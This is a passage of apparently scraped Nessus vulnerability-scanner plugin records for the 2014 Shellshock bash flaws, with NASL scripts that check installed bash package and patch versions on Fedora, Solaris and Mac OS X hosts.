pkg:\"bash>3.1<=3.1.18\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>3.2<=3.2.52\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>4.0<=4.0.39\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>4.1<=4.1.12\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>4.2<=4.2.48\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>4.3<4.3.25_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>3.0<=3.0.17\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>3.1<=3.1.18\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>3.2<=3.2.52\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>4.0<=4.0.39\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>4.1<=4.1.12\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>4.2<=4.2.48\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>4.3<4.3.25_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux_base-c6<6.5_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:13:27", "description": "This build should fix CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Fedora 20 : bash-4.2.48-2.fc20 (2014-11527) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-11527.NASL", "href": "https://www.tenable.com/plugins/nessus/77941", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11527.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77941);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"FEDORA\", value:\"2014-11527\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Fedora 20 : bash-4.2.48-2.fc20 (2014-11527) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This build should fix CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1146319\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138687.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9e5e2549\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"bash-4.2.48-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:13:27", "description": "SunOS 5.9_x86: bash patch. \n\nDate this patch was last updated by Oracle : Sep/26/14", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Solaris 9 (x86) : 149080-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_X86_149080-01.NASL", "href": "https://www.tenable.com/plugins/nessus/77912", "sourceData": "#%NASL_MIN_LEVEL 70300\n# @DEPRECATED@\n#\n# This script has been deprecated by solaris9_x86_149080.nasl.\n#\n# Disabled on 2014/10/13.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77912);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Solaris 9 (x86) : 149080-01\");\n script_summary(english:\"Check for patch 149080-01\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is missing Oracle Security Patch number 149080-01\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.9_x86: bash patch. \n\nDate this patch was last updated by Oracle : Sep/26/14\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149080-01\");\n script_set_attribute(attribute:\"solution\", value:\"You should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pure-FTPd External Authentication Bash Environment Variable Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\", \"Host/Solaris/pkginfo\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #78113 (solaris9_x86_149080.nasl) instead.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\nif (!get_kb_item(\"Host/Solaris/pkginfo\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"149080-01\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.9.0,REV=2002.03.02.00.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"149080-01\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.9.0,REV=2002.03.02.00.30\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:21:58", "description": "The remote Mac OS X host has a version of Bash prior to 3.2.53(1)-release installed. It is, therefore, affected by a command injection vulnerability via environment variable manipulation.\nDepending on the configuration of the system, an attacker could remotely execute arbitrary code.", "cvss3": {}, "published": "2014-09-30T00:00:00", "type": "nessus", "title": "GNU Bash Local Environment Variable Handling Command Injection (Mac OS X) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/a:gnu:bash"], "id": "MACOSX_SHELLSHOCK_UPDATE.NASL", "href": "https://www.tenable.com/plugins/nessus/77971", "sourceData": "#TRUSTED 0bfe77f24b556106190d409aef24f2e50906250021afb259affbaa0367c434e6b5ce298ef857ff52525560cd144355465df03ed5557f61402c5077dda514ffe45fde5c522e871ae78159e4c749338f2814b1c001fd0c9332792e57ef20d3b8ec63f8496601d7073fd80e71987f13c9829921737fd0718fdcb7713a8158b07881561ec220c8fcb6e9b91fd8f5f29c6f873787287d05361517f50b4351c1c0280335ea0700dd1ff0dcd2cfc139dac3ad911ec1f4193474c429adc3aebac7c5c8cb0ad2201095384f5fe5cc518ca59afc5a17130133b9ef120f5fd961879d848a07775d4d858225199a6a70a0088d5ae783bf360e714b3cd02062b732be4435824f8939fa2c9511b56dddcc8ea99350ed058b641dd24298a6e79e08c2c1858e752be1cd1439b5dfa456cd5f3e24a95f2961c8a1c0641176abfa1ccc63d2ee8ea9c90757f36f65ae672e5b161536dc2c4af003a0293d54de2ee4daaf8925a24ac6a86d61d376a48af1c02214789f1eed1e82ceb66178d6bddaecf0b6368d51cb66d176076ed2f69c74a785f6c7e6780871f1963f96ef3974faa89dce04553935570eb8bf03be73fe7ebc23b0c34ac88114146804cc31999b6dfcb1d553c8454baf38944bba103c5a046170f4b0f93e7a4596951b45002e6e271a9c94c5a94620756a17161dce572a5f0da72c9a71071f81ab460c2cefa9cc777bae51246da52bf282\n#TRUST-RSA-SHA256 5bc46397bf4a74b0ce33b34885c6b2436c8690a5b1d3ee7ca92dc3a7dbce6257cfebd5d6173507ee1ea8eed03d13d8e18f0454d972c881de6152ff1b9def188a4bbecce9c2a825bef80d36087aa2423f2c8d506ac0ad183a9a7e8b402bb85c41eac4a6743c3f0c903f1e1ba1115ae4ad35862e69abebc7bad5e9125461af9bf0418540bf443f8f9e9ce7a3689a08fbc0aa6d58313bf69e7db86c3dd5169289a62923990203bc5a531cf7d6671ea0584364a808d7dc621241a941864bc88a4a81c4e92606fd059a787133eacc98c979bfa0acbb797fcd87b719bd39fdae0c3f3e498f0952891dc93e7bc02c455cbd9e2b1fec56cd122fd9154aa627fdada7b86e9e98e22d1503ad07711574fc498a913acbf2aac7524568174b0a8fc28bc89920f0463c892323201767118a478494e9aca03b26cfd8ce1f7eac0c7ecc86bd47802960fe990762a4d312f17fd7144920baf1a9a582155b3e7620fd21c59a717e675ed1aff8ae49a1b96516905c9039665890c293bfc9c20690c263691f5c8a69f90fd269ed7d06411200c1f1c1e22fb6ea4efb2cc53b3f4990df83d71268481f3ba0f05af212303905ad956a6c9c8d5a3fabba4592800321650aab79e6203fd2d72c8da200e31ad4647f56acb3a8ddc854ab1dab01d16b70ba3561462298a2533e64ae53eae69a61b3e1b558429724cb1047b51d01e043fc05ad0966af68632d47\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77971);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"GNU Bash Local Environment Variable Handling Command Injection (Mac OS X) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is is affected by a remote code execution\nvulnerability, commonly referred to as Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X host has a version of Bash prior to\n3.2.53(1)-release installed. It is, therefore, affected by a command\ninjection vulnerability via environment variable manipulation.\nDepending on the configuration of the system, an attacker could\nremotely execute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT6495\");\n # https://lists.apple.com/archives/security-announce/2014/Sep/msg00001.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b5039c7b\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/DL1767\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/DL1768\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/DL1769\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the vendor-supplied patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS ||\n get_one_kb_item('HostLevelChecks/proto') == 'local')\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.[7-9]([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.9 / 10.8 / 10.7\");\n\nver_sh = NULL;\nver_bash = NULL;\n\npat = \"version ([0-9.]+\\([0-9]+\\))(\\-[a-z]+)?\";\n\ncmd = \"bash --version\";\nresult = exec_cmd(cmd:cmd);\nitem = eregmatch(pattern:pat, string:result);\nif (!isnull(item)) ver_bash_disp = item[1];\n\ncmd = \"sh --version\";\nresult = exec_cmd(cmd:cmd);\nitem = eregmatch(pattern:pat, string:result);\nif (!isnull(item)) ver_sh_disp = item[1];\n\nif (ver_sh_disp)\n{\n ver_sh = ereg_replace(string:ver_sh_disp, pattern:\"\\(\", replace:\".\");\n ver_sh1 = ereg_replace(string:ver_sh, pattern:\"\\)\", replace:\"\");\n}\nelse ver_sh1 = NULL;\nif (ver_bash_disp)\n{\n ver_bash = ereg_replace(string:ver_bash_disp, pattern:\"\\(\", replace:\".\");\n ver_bash1 = ereg_replace(string:ver_bash, pattern:\"\\)\", replace:\"\");\n}\nelse ver_bash1 = NULL;\n\nfix_disp = '3.2.53(1)';\nfix = '3.2.53.1';\n\nif (\n (!isnull(ver_sh1) && ver_compare(ver:ver_sh1, fix:fix, strict:FALSE) == -1) ||\n (!isnull(ver_bash1) && ver_compare(ver:ver_bash1, fix:fix, strict:FALSE) == -1)\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + ver_bash_disp +\n '\\n Fixed version : ' + fix_disp +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(port:0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'Bash', ver_bash_disp);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:01", "description": "Fix for CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Fedora 21 : bash-4.3.25-2.fc21 (2014-11718) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2014-11718.NASL", "href": "https://www.tenable.com/plugins/nessus/77945", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11718.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77945);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"FEDORA\", value:\"2014-11718\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Fedora 21 : bash-4.3.25-2.fc21 (2014-11718) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Fix for CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1146319\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/139129.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?625e21b5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"bash-4.3.25-2.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:14:10", "description": "SunOS 5.9: bash patch.\nDate this patch was last updated by Sun : Sep/30/14", "cvss3": {}, "published": "2014-10-09T00:00:00", "type": "nessus", "title": "Solaris 9 (sparc) : 149079-03", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_149079.NASL", "href": "https://www.tenable.com/plugins/nessus/78112", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78112);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Solaris 9 (sparc) : 149079-03\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 149079-03\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.9: bash patch.\nDate this patch was last updated by Sun : Sep/30/14\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149079-03\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149079-01\");\n script_set_attribute(attribute:\"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 